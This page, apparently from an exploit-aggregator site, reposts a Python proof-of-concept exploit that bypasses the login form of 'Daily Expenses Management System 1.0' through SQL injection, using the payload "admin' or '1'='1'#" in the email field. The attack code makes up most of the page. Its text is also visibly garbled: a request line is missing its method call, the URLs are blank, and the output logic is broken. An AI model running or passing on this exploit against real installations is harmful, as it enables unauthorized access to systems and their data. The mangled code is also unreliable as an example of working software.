Looking for a fix? Check your Codebase security with multiple scanners from

Edit Report

Our sensors found this exploit at:

Below is a copy:

Daily Expenses Management System 1.0 username SQL Injection
# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection
# Exploit Author: Daniel Ortiz
# Date: 2020-08-01
# Vendor Homepage:
# Tested on: XAMPP Version 5.6.40 / Windows 10
# Software Link:

import sys
import requests
import urllib3
import re
import time


def make_request(url, payload):
    p = {"http":"", "https": ""}
    s = requests.Session()
    r =, data=payload, proxies=p)
    return r

if __name__ == '__main__':

    if len(sys.argv) != 2:
        print("[*] Daily Expenses Management System | username SQL injection")
        print("[*] usage: %s  TARGET" % sys.argv[0])
        print("[*] e.g: %s" % sys.argv[0]) 

    TARGET = sys.argv[1]
    LOGIN_FORM = "http://%s/dets/" % TARGET
    # Step 1 - Bypass login form

    url = LOGIN_FORM
    p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'} 
    r = make_request(url, p1)
    print("[+] Endpoint: %s") % LOGIN_FORM
    print("[+] Making requests with payload: %s") % p1

    if re.findall('Dashboard', r.text):
        print("[+] Target vulnerable")
        print("[-] Error !!!")

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.